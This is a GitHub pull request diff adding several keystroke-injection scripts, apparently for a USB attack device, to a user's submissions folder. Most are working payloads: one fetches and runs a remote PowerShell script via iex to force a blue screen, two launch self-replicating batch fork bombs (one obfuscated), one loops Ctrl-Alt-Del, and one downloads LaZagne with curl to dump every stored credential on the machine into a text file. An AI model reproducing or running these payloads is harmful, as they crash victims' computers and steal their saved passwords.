Skip to content

Migrate scripts from my own repo to fork #10

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 2 commits into
base: main
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
5 changes: 5 additions & 0 deletions submissions/ApplezDuck/scripts/ACTIVPANELREBOOT
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
VAR x 1

WHILE $x == 1
CTRL ALT DEL
END_WHILE
12 changes: 12 additions & 0 deletions submissions/ApplezDuck/scripts/BSOD
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
REM BSOD
REM -------------------------------------------------

GUI r
DELAY 1000
STRING powershell
ENTER

DELAY 2000
STRING iex https://raw.githubusercontent.com/peewpw/Invoke-BSOD/master/Invoke-BSOD.ps1';Invoke-BSOD
REM this gets the script
ENTER
10 changes: 10 additions & 0 deletions submissions/ApplezDuck/scripts/LAG
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
VAR x 1

WHILE $x == 1
GUI r
DELAY 750
STRING cmd
ENTER
STRING echo %0 | %0 > cscr.bat
STRING start cscr.bat
END_WHILE
12 changes: 12 additions & 0 deletions submissions/ApplezDuck/scripts/PWDHASH
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
GUI r
DELAY 750
STRING cmd
ENTER
DELAY 1500
STRING curl -sSLo %TEMP%\LaZagne.exe https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/LaZagne.exe && %TEMP%\LaZagne.exe all > .\LZg.txt && del %TEMP%\LaZagne.exe
DELAY 5000
ENTER
DELAY 1000
STRING notepad LZg.txt


6 changes: 6 additions & 0 deletions submissions/ApplezDuck/scripts/RICKROLL
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
REM i hate coding on my phjone

GUI r
DELAY 500
STRING msedge https://coolstuff.hackrland.dev
ENTER
7 changes: 7 additions & 0 deletions submissions/ApplezDuck/scripts/SHHHHHH
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1750
STRING @echo.%0^|%0>$^_^.c^md&$_>nul
ENTER
25 changes: 25 additions & 0 deletions submissions/ApplezDuck/scripts/SYSINFO
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
REM this is a script to fetch some system data to files
REM ------------------------------------------------------

FUNCTION IPCONFIG
GUI r
DELAY 750
STRING cmd
ENTER
DELAY 1500
STRING ipconfig > .IPCONFIG
END_FUNCTION

FUNCTION ROUTE
GUI r
DELAY 750
STRING cmd
ENTER
DELAY 1500
STRING rdinfo > .RDINFO
END_FUNCTION

CALL IPCONFIG

CALL ROUTE